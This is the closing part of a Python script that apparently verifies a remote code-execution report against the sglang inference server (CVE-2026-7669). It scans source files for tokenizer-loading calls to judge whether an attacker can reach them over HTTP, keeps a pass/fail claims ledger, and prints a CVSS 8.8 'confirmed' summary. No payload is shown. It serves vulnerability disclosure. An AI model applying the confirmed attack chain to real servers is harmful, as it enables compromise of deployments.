    def count_in_handlers(text, pattern):
        # Count occurrences in lines that are not blank and not pure comments.
        # Returns None when `text` is None so a missing file propagates as N/A.
        if text is None:
            return None
        n = 0
        for line in text.split("\n"):
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            n += line.count(pattern)
        return n

    http_src = read_or_empty(http_server_path)
    tm_src = read_or_empty(tokenizer_manager_path)
    mt_src = read_or_empty(multi_tok_path)
    # 1a: get_tokenizer( in HTTP server source (not just route handlers, the
    # whole module -- if it appears anywhere here it would be reachable from
    # request handling code paths).
    n_gt_http = count_in_handlers(http_src, "get_tokenizer(")
    # 1b: AutoTokenizer.from_pretrained( in HTTP server source. Catches the
    # case where a handler bypasses get_tokenizer() and calls transformers
    # directly with attacker-controlled paths.
    n_ftp_http = count_in_handlers(http_src, "AutoTokenizer.from_pretrained(")
    # 1c: instantiations of any class whose __init__ calls get_tokenizer.
    # If any of these are constructed inside a route handler it could re-
    # fire the override.
    instantiation_patterns = ("TokenizerManager(", "TokenizerWorker(",
                              "TPWorker(", "DetokenizerManager(", "Scheduler(")
    n_instantiations = sum(
        count_in_handlers(http_src, p) for p in instantiation_patterns
    ) if http_src is not None else None
    # 1d: reload-like methods that reassign self.tokenizer.
    # Today's code reassigns self.tokenizer only inside __init__ and the
    # init_tokenizer_and_processor helper (called once from __init__).
    # Any future method named reload/swap/replace/update/refresh/load_tokenizer
    # would constitute a reload primitive and break the UI:R argument.
    if tm_src is not None:
        suspect_method_names = (
            "reload_tokenizer", "swap_tokenizer", "replace_tokenizer",
            "update_tokenizer", "refresh_tokenizer", "load_tokenizer",
            "set_tokenizer", "reinit_tokenizer", "reset_tokenizer",
        )
        n_reassign_outside_init = 0
        for name in suspect_method_names:
            # match "def <name>" or "async def <name>" at any indent level
            for line in tm_src.split("\n"):
                stripped = line.strip()
                if (stripped.startswith(f"def {name}(")
                        or stripped.startswith(f"async def {name}(")):
                    n_reassign_outside_init += 1
        # And: confirm the one helper that reassigns is called only from __init__
        helper_callers = tm_src.count("self.init_tokenizer_and_processor(")
        if helper_callers != 1:
            n_reassign_outside_init += 1
    else:
        n_reassign_outside_init = None
    # 1e: TokenizerWorker (multi-tokenizer mode) only constructs in bootstrap.
    # Verify its __init__ is the only get_tokenizer reach in that file.
    n_gt_mtok = count_in_handlers(mt_src, "get_tokenizer(") if mt_src else None
    chain_results = {
        "1a-get_tokenizer in http_server.py": n_gt_http,
        "1b-AutoTokenizer.from_pretrained in http_server.py": n_ftp_http,
        "1c-tokenizer-class instantiations in http_server.py": n_instantiations,
        "1d-reload-like tokenizer methods (reload/swap/replace/etc)": n_reassign_outside_init,
        "1e-get_tokenizer in multi_tokenizer_mixin.py": n_gt_mtok,
    }
    # http_server.py legitimately constructs TokenizerWorker once at server
    # bootstrap (line ~238). Allow exactly one instantiation hit there.
    expected_max = {
        "1a-get_tokenizer in http_server.py": 0,
        "1b-AutoTokenizer.from_pretrained in http_server.py": 0,
        "1c-tokenizer-class instantiations in http_server.py": 1,
        "1d-reload-like tokenizer methods (reload/swap/replace/etc)": 0,
        "1e-get_tokenizer in multi_tokenizer_mixin.py": 0,
    }
    failures = []
    for k, v in chain_results.items():
        if v is None:
            continue  # source not found; covered by NA below
        if v > expected_max[k]:
            failures.append(f"{k}={v} (max allowed={expected_max[k]})")
    if any(v is None for v in chain_results.values()):
        claim("CHAIN-1",
              "No HTTP-reachable code path invokes get_tokenizer() post-startup",
              "NA",
              f"one or more sglang source files missing: {chain_results}")
    elif failures:
        claim("CHAIN-1",
              "No HTTP-reachable code path invokes get_tokenizer() post-startup",
              "FAIL",
              f"hits exceeding expected max: {failures}; full counts: {chain_results}")
    else:
        claim("CHAIN-1",
              "No HTTP-reachable code path invokes get_tokenizer() post-startup",
              "PASS",
              f"5 independent checks all clean: {chain_results}. "
              f"The single allowed instantiation in http_server.py is the bootstrap "
              f"TokenizerWorker(server_args, port_args) at server launch.")
    # CHAIN-2: explicit verdict on UI:N argument, derived from the AUTH-1 and
    # CHAIN-1 entries already in LEDGER.
    auth_bypass = next((c for c in LEDGER if c["id"] == "AUTH-1"), None)
    chain_blocked = next((c for c in LEDGER if c["id"] == "CHAIN-1"), None)
    if (auth_bypass and auth_bypass["status"] == "PASS"
            and chain_blocked and chain_blocked["status"] == "PASS"):
        claim("CHAIN-2",
              "UI:N is NOT justified for CVE-2026-7669: auth bypass exists but cannot reach get_tokenizer",
              "PASS",
              "Auth bypass is real (AUTH-1) but no reachable HTTP path invokes "
              "get_tokenizer or its preconditions (CHAIN-1, 5 checks). Operator "
              "must choose the model_path at launch_server invocation. "
              "UI:R stands. CVSS 8.8 High is the correct floor.")
    else:
        claim("CHAIN-2",
              "UI:N reachability verdict",
              "NA",
              f"AUTH-1={auth_bypass['status'] if auth_bypass else 'missing'} "
              f"CHAIN-1={chain_blocked['status'] if chain_blocked else 'missing'}")
    print("\n" + "=" * 72)
    print(" SUMMARY")
    print("=" * 72)
    print()
    rows = [
        ("Phase 1 transformers + False", p1_type, p1_executed),
        ("Phase 1b PATCHED sglang + False", p1b_type, p1b_executed),
        ("Phase 2 REAL sglang + False", p2_type, p2_executed),
        ("Phase 2b PATCHED sglang + True", p2b_type, p2b_executed),
        ("Phase 3 REAL sglang + False (slow)", p3_type, p3_executed),
    ]
    for label, t, exe in rows:
        print(f" {label:42s} return={t!s:30s} exec={exe}")
    # p1_executed and p1b_executed are necessarily False at this point (each
    # exits 2 above), so this reduces to p2_executed; kept explicit for clarity.
    confirmed = (p2_executed and not p1_executed and not p1b_executed)
    passed = sum(1 for c in LEDGER if c["status"] == "PASS")
    failed = sum(1 for c in LEDGER if c["status"] == "FAIL")
    na = sum(1 for c in LEDGER if c["status"] == "NA")
    print(f"\n Claims: {passed} PASS / {failed} FAIL / {na} N/A / {len(LEDGER)} TOTAL")
    print()
    print(" CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H = 8.8 High")
    write_ledger()
    print()
    print("=" * 72)
    if confirmed and failed == 0:
        print(" *** VULNERABILITY CONFIRMED -- ALL CLAIMS BACKED ***")
        print("=" * 72)
        sys.exit(0)
    elif confirmed:
        print(" VULNERABILITY CONFIRMED but some claims FAILED, inspect ledger")
        print("=" * 72)
        sys.exit(0)
    else:
        print(" VULNERABILITY NOT CONFIRMED")
        print("=" * 72)
        sys.exit(1)
# Script entry point; main() terminates the process via sys.exit with the
# documented status code.
if __name__ == "__main__":
    main()